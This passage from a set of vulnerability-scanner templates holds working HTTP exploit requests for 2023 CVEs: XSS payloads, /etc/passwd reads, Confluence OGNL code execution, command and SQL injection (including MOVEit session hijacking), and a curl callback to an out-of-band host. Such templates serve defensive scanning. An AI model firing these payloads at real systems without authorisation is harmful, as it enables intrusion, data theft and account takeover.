error"]}],"extractors":[{"type":"kval","name":"xcsrftoken","group":1,"internal":true,"kval":["X_CSRF_Token"]}]}]},{"id":"CVE-2023-24733","info":{"name":"PMB 7.4.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3@1=<script>alert(document.domain)</script>@"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2796","info":{"name":"EventON <= 2.1 - Missing Authorization","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["BEGIN:VCALENDAR","END:VCALENDAR"],"condition":"and"},{"type":"word","part":"header","words":["text/Calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-25573","info":{"name":"Metersphere - Arbitrary File Read","severity":"high"},"requests":[{"raw":["POST /api/jmeter/download/files HTTP/1.1\nContent-Type: application/json\n\n{\"reportId\":\"{{str}}\",\"bodyFiles\":[{\"id\":\"{{rand}}\",\"name\":\"/etc/passwd\"}]}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/etc/passwd"]},{"type":"word","part":"header","words":["filename=\"{{str}}.zip\"","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35082","info":{"name":"MobileIron Core - Remote Unauthenticated API Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/mifs/asfV3/api/v2/admins/users"],"max-size":100,"matchers":[{"type":"dsl","dsl":["contains_all(body, 'results','userId','name')","contains(header, 'application/json')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-4112","info":{"name":"PHPJabbers Shuttle Booking Software 1.0 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1"],"matchers":[{"type":"dsl","dsl":["contains(body, \"PHPJabbers\") && contains(body, \"><script>alert(document.domain)</script>\")","contains(content_type, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-29887","info":{"name":"Nuovo Spreadsheet Reader 0.5.11 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd","{{BaseURL}}/nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-30212","info":{"name":"OURPHP <= 7.2.0 -  Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["location.href='../..</script><script>alert(document.domain)</script>'"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42343","info":{"name":"OpenCMS - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27\"><svg%20onload=alert(document.domain)>"],"headers":{"Content-Type":"application/cmisquery+xml"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Apache Chemistry OpenCMIS","<svg onload=alert(document.domain)>"],"condition":"and"}]}]},{"id":"CVE-2023-37265","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Internal IP","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"X-Forwarded-For":"127.0.0.1"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-20073","info":{"name":"Cisco VPN Routers - Unauthenticated Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["GET /index.html HTTP/1.1\nHost: {{Hostname}}\n","POST /api/operations/ciscosb-file:form-file-upload HTTP/1.1\nHost: {{Hostname}}\nAuthorization: 1\nContent-Type: multipart/form-data; boundary=------------------------f6f99e26f3a45adf\n\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"pathparam\"\n\nPortal\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"fileparam\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file.path\"\n\nindex.html\n--------------------------f6f99e26f3a45adf\nContent-Disposition: form-data; name=\"file\"; filename=\"index.html\"\nContent-Type: application/octet-stream\n\n{{index}}\n{{html_comment}}\n\n--------------------------f6f99e26f3a45adf--\n","GET /index.html HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"dsl","name":"index","internal":true,"dsl":["body_1"]}],"matchers":[{"type":"word","part":"body_3","words":["{{html_comment}}"]}]}]},{"id":"CVE-2023-5991","info":{"name":"Hotel Booking Lite < 4.8.5 - Arbitrary File Download & Deletion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?filename=../../../../../../etc/passwd&mphb_action=download"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["filename=","/etc/passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22518","info":{"name":"Atlassian Confluence Server - Improper Authorization","severity":"critical"},"requests":[{"raw":["POST /json/setup-restore.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryT3yekvo0rGaL9QR7\nX-Atlassian-Token: no-check\n\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"buildIndex\"\n\nfalse\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"file\";filename=\"{{randstr}}.zip\"\n\n{{randstr}}\n------WebKitFormBoundaryT3yekvo0rGaL9QR7\nContent-Disposition: form-data; name=\"edit\"\n\nUpload and import\n------WebKitFormBoundaryT3yekvo0rGaL9QR7--\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(body,'The zip file did not contain an entry', 'exportDescriptor.properties')"],"condition":"and"}]}]},{"id":"CVE-2023-3479","info":{"name":"Hestiacp <= 1.7.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/templates/pages/debug_panel.php?id={{randstr}}\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["debug-panel","<script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39600","info":{"name":"IceWarp 11.4.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?color=\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","IceWarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-37580","info":{"name":"Zimbra Collaboration Suite (ZCS) v.8.8.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /zimbra/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginOp=login&username={{username}}&password={{password}}&client=mobile\n","GET /m/momoveto?st=\"><img%20src=x%20onerror=alert(document.domain)> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<img src=x onerror=alert(document.domain)>","id=\"zMoveForm\""],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22527","info":{"name":"Atlassian Confluence - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /template/aui/text-inline.vm HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate, br\nContent-Type: application/x-www-form-urlencoded\n\nlabel=aaa\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader(\\u0027x_vuln_check\\u0027,(new+freemarker.template.utility.Execute()).exec({\"whoami\"}))\n\n"],"matchers":[{"type":"dsl","dsl":["x_vuln_check != \"\"","contains(to_lower(body), 'empty{name=')"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["x_vuln_check"]}]}]},{"id":"CVE-2023-41109","info":{"name":"SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection","severity":"critical"},"requests":[{"raw":["POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\nHost: {{Hostname}}\nCookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n{\"cmd\":\"{{payload}}\",\"arguments\":[]}\n"],"matchers":[{"type":"word","part":"body","words":["dd556350275e2ee0a2e877cea9c8a74a"]}]}]},{"id":"CVE-2023-23752","info":{"name":"Joomla! Webservice - Password Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/index.php/v1/config/application?public=true","{{BaseURL}}/api/v1/config/application?public=true"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"links\":","\"attributes\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json","application/vnd.api+json"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42344","info":{"name":"OpenCMS - XML external entity (XXE)","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/opencms/cmisatom/cmis-online/query","{{BaseURL}}/cmisatom/cmis-online/query"],"headers":{"Content-Type":"application/xml;charset=UTF-8","Referer":"{{RootURL}}"},"body":"<?xml version='1.0' encoding='UTF-8'?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><cmis:query xmlns:cmis=\"<http://docs.oasis-open.org/ns/cmis/core/200908/>\"><cmis:statement>&test;</cmis:statement><cmis:searchAllVersions>false</cmis:searchAllVersions><cmis:includeAllowableActions>false</cmis:includeAllowableActions><cmis:includeRelationships>none</cmis:includeRelationships><cmis:renditionFilter>cmis:none</cmis:renditionFilter><cmis:maxItems>100</cmis:maxItems><cmis:skipCount>0</cmis:skipCount></cmis:query>\n","stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","invalidArgument"],"condition":"and"}]}]},{"id":"CVE-2023-47117","info":{"name":"Label Studio - Sensitive Information Exposure","severity":"high"},"requests":[{"raw":["GET /user/login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /user/login/?next=/projects/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrfmiddlewaretoken={{csrf}}&email={{username}}&password={{password}}&persist_session=on\n","PATCH /api/dm/views/{{Task_id}}?interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\":{{Task_id}},\"data\":{\"title\":\"Tasks\",\"ordering\":[],\"type\":\"list\",\"target\":\"tasks\",\"filters\":{\"conjunction\":\"or\",\"items\":[{\"filter\":\"filter:tasks:updated_by__active_organization__active_users__password\",\"operator\":\"regex\",\"value\":\"^pbkdf2_sha256\\\\$260000\\\\$\",\"type\":\"String\"}]},\"hiddenColumns\":{\"explore\":[],\"labeling\":[]},\"columnsWidth\":{},\"columnsDisplayType\":{},\"gridWidth\":4,\"search_text\":null},\"project\":\"{{Project_id}}\"}\n","GET /api/tasks?page=1&page_size=30&view={{Task_id}}&interaction=filter&project={{Project_id}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_4, \"completed_at\", \"file_upload\", \"annotators\")","status_code_3==200 && status_code_4==200","contains(header_4, \"application/json\")"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","name":"csrf","group":1,"regex":["me=\"csrfmiddlewaretoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]}]},{"id":"CVE-2023-30150","info":{"name":"PrestaShop leocustomajax 1.0 & 1.0.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /modules/leocustomajax/leoajax.php?cat_list=(SELECT(0)FROM(SELECT(SLEEP(6)))a) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","contains(tolower(response_1), \"prestashop\")"],"condition":"and"}]}]},{"id":"CVE-2023-1454","info":{"name":"Jeecg-boot 3.5.0 qurestSql - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json;charset=UTF-8\n\n{\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SQLException","XPATH syntax error:"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["XPATH syntax error: '([a-z_@%]+)'","XPATH syntax error: '([a-z- @%]+)'","XPATH syntax error: '([a-z@%0-9.]+)'"],"part":"body"}]}]},{"id":"CVE-2023-29623","info":{"name":"Purchase Order Management v1.0 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{randstr}}&password=%3cimg%20src%3dx%20onerror%3dalert(document.domain)%3e\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","incorrect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-1892","info":{"name":"Sidekiq < 7.0.8 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/queues"],"matchers":[{"type":"word","internal":true,"part":"body","words":["Sidekiq","Dashboard</a>"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E","{{BaseURL}}/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img/src/onerror=alert(document.domain)>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2949","info":{"name":"OpenEMR < 7.0.1 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/interface/forms/eye_mag/js/eye_base.php?providerID=%3Cimg%20src=x%20onerror=alert(document.domain);%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"<img src=x onerror=alert(document.domain);>\", \"openemr\")"],"condition":"and"}]}]},{"id":"CVE-2023-25717","info":{"name":"Ruckus Wireless Admin - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0"],"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), 'user-agent','curl')","status_code_1 == 302"],"condition":"and"}]}]},{"id":"CVE-2023-2272","info":{"name":"Tiempo.com <= 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin.php?page=tiempocom%2Fapp%2Fadmin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=%22%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<svg/onload=alert(document.domain)>\")","contains(body_2, \"Tiempo\")"],"condition":"and"}]}]},{"id":"CVE-2023-3765","info":{"name":"MLflow Absolute Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/ajax-api/2.0/mlflow-artifacts/artifacts?path=C:/"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"is_dir\":","\"path\":","\"files\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-35162","info":{"name":"XWiki < 14.10.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xwiki/bin/get/FlamingoThemes/Cerulean?xpage=xpart&vm=previewactions.vm&xcontinue=javascript:alert(document.domain)"],"matchers":[{"type":"dsl","dsl":["contains(body, \"name=\\\"xcontinue\\\" value=\\\"javascript:alert(document.domain)\")","contains(body, \"previewactions.vm\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-45852","info":{"name":"Viessmann Vitogate 300 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/vitogate.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"method\":\"put\",\"form\":\"form-4-8\",\"session\":\"\",\"params\":{\"ipaddr\":\"{{randstr}};cat /etc/passwd\"}}\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"application/json\")","contains_all(body, \"traceroute: {{randstr}}: Unknown host\", \"daemon:x:1:1:\")"],"condition":"and"}]}]},{"id":"CVE-2023-52085","info":{"name":"Winter CMS Local File Inclusion - (LFI)","severity":"medium"},"requests":[{"raw":["GET /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\n","POST /backend/backend/auth/signin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n_token={{_token}}&postback=1&login={{username}}&password={{password}}\n","POST /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-WINTER-REQUEST-HANDLER: onSave\nX-WINTER-REQUEST-PARTIALS:\nX-Requested-With: XMLHttpRequest\n\n_token={{_token}}&MailBrandSetting%5Bbody_bg%5D=%2342445B;@import%20(inline)%20%22/etc/passwd%22&redirect=0\n","GET /backend/system/mailbrandsettings HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers":[{"type":"regex","part":"body_4","regex":["root:[x*]:0:0:"]}],"extractors":[{"type":"regex","part":"body","name":"_token","group":1,"regex":["<input name=\"_token\" type=\"hidden\" value=\"([0-9a-zA-Z]{40})\">"],"internal":true}]}]},{"id":"CVE-2023-43326","info":{"name":"MooSocial 3.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/users/change_emailahrixia%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3eahrixia?step1=1"],"matchers":[{"type":"dsl","dsl":["status_code == 404","contains(content_type, \"text/html\")","contains_all(body, \"<img src=a onerror=alert(document.domain)>\", \"mooSocial\")"],"condition":"and"}]}]},{"id":"CVE-2023-39598","info":{"name":"IceWarp Email Client - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webmail/?mid={{to_lower(rand_base(4))}}\"><img src=x onerror=confirm(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img src=x onerror=confirm(document.domain)>","icewarp"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-0968","info":{"name":"WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"/onmouseover=alert(document.domain)//\")","contains(body_2, \"Watu Quizzes\")"],"condition":"and"}]}]},{"id":"CVE-2023-5089","info":{"name":"Defender Security < 4.1.0 - Protection Bypass (Hidden Login Page)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?gf_page=randomstring"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["%2F%3Fgf_page%3Drandomstring&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2023-44353","info":{"name":"Adobe ColdFusion WDDX Deserialization Gadgets","severity":"critical"},"requests":[{"raw":["POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{windows_bad_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_known_path}}</string></var></struct></data></wddxPacket>\n","POST /CFIDE/wizards/common/utils.cfc?method=wizardHash%20inPassword=bar%20_cfclient=true HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nargumentCollection=<wddxPacket+version='1.0'><header/><data><struct+type='acoldfusion.tagext.io.cache.CacheTaga'><var+name='directory'><string>{{linux_bad_path}}</string></var></struct></data></wddxPacket>\n"],"matchers-condition":"or","matchers":[{"type":"dsl","name":"windows","dsl":["status_code_1 == 500 && status_code_2 == 404","contains(body_1, \"coldfusion.runtime\")"],"condition":"and"},{"type":"dsl","name":"linux","dsl":["status_code_3 == 500 && status_code_4 == 404","contains(body_3, \"coldfusion.runtime\")"],"condition":"and"}]}]},{"id":"CVE-2023-41621","info":{"name":"Emlog Pro v2.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"response","words":["onmouseover='alert(document.domain)'bad=","emlog"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-36934","info":{"name":"MOVEit Transfer - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%27{{session_cookie}}%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+IpAddress=%27{{public_ip()}}%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%27{{session_cookie}}%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%27{{session_cookie}}%27%23 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntransaction=signon\n","POST /human.aspx?ep={{url_encode(ep)}} HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nCookie: InitialPage=zzzz.aspx;\n\ntransaction=passchangerequest\n","POST /machine.aspx HTTP/2\nHost: {{Hostname}}\nCookie: siLockLongTermInstID=0; ASP.NET_SessionId={{session}};\n\na=a\n","POST /api/v1/auth/token HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: python-requests/2.26.0\nAccept-Encoding: gzip, deflate\nCookie: ASP.NET_SessionId={{session_cookie}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=session&username=x&password=x\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_4","words":["\"refresh_token\"","\"access_token\"","\"token_type\"","\"expires_in\""],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"ep","group":1,"regex":["\\bep=([^&]+)\""],"internal":true,"part":"body_1"},{"type":"regex","name":"session","group":1,"regex":["ASP.NET_SessionId=([^;]+)"],"internal":true,"part":"header_2"},{"type":"regex","group":1,"regex":["\"access_token\":\"([^\"]+)\""],"part":"body_4"}]}]},{"id":"CVE-2023-37266","info":{"name":"CasaOS  < 0.4.4 - Authentication Bypass via Random JWT Token","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/folder?path=%2F"],"headers":{"Authorization":"{{jwt_token}}"},"matchers":[{"type":"word","words":["\"success\":200","\"message\":\"ok\"","content","is_dir"],"condition":"and"}],"extractors":[{"type":"json","json":[".data.content[].path"]}]}]},{"id":"CVE-2023-2479","info":{"name":"Appium Desktop Server - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?url=<img/src=\"http://{{interactsh-url}}\">"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"]},{"type":"word","part":"header","words":["application/json"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2023-1890","info":{"name":"Tablesome < 1.0.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=tablesome_cpt&a%22%3e%3cscript%3ealert`document.domain`%3c%2fscript%3e HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert`document_domain`</script>\")","contains(body_2, \"tablesome\")"],"condition":"and"}]}]},{"id":"CVE-2023-39143","info":{"name":"PaperCut < 22.1.3 - Path Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/custom-report-example/..\\..\\..\\deployment\\sharp\\icons\\home-app.png"],"matchers":[{"type":"dsl","dsl":["content_length == 1655","status_code == 200","contains(to_lower(content_type), \"image/png\")","contains(hex_encode(body), \"89504e470d0a1a0a\")"],"condition":"and"}]}]},{"id":"CVE-2023-39120","info":{"name":"Nodogsplash - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/config/nodogsplash"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["nodogsplash","password"],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-6831","info":{"name":"mlflow - Path Traversal","severity":"high"},"requests":[{"raw":["PUT /api/2.0/mlflow-artifacts/artifacts/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{randstr}}\n","DELETE /api/2.0/mlflow-artifacts/artifacts/%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252F%252E%252E%252Fetc%252fpasswd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_2","words":["Content-Type: application/json","Server: gunicorn"],"condition":"and"},{"type":"word","part":"body_2","words":["{}"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2023-35160","info":{"name":"XWiki >= 2.5-milestone-2 - Cross-Site 